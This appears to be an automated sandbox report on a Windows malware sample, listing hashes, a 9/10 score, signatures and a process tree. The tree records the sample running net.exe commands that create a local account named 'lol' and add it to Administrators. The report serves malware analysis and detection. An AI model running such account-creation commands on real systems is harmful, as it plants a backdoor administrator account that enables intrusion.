Analysis
-
max time kernel
139s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
08-06-2022 04:21
General
-
Target
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
-
Size
72KB
-
MD5
1f299506e50a82c1111969d4bf76e7ea
-
SHA1
9758832ef27dc5b099417f505da7060dd9f7695e
-
SHA256
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8
-
SHA512
a960f7751d479101ce4d64ac0bbdde1700c7cbeacdd9a6c6f15faaef959a582934cc6053ef2d4fab2c408581a3a477dab02c38d191682b9ca9f894058dd49673
Score
9/10
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe"C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net user lol j /ADD && net localgroup Administrators lol /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user lol j /ADD3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user lol j /ADD4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators lol /ADD3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators lol /ADD4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/796-131-0x0000000000000000-mapping.dmp
-
memory/1044-133-0x0000000000000000-mapping.dmp
-
memory/1404-130-0x0000000000000000-mapping.dmp
-
memory/2104-134-0x0000000000000000-mapping.dmp
-
memory/2824-132-0x0000000000000000-mapping.dmp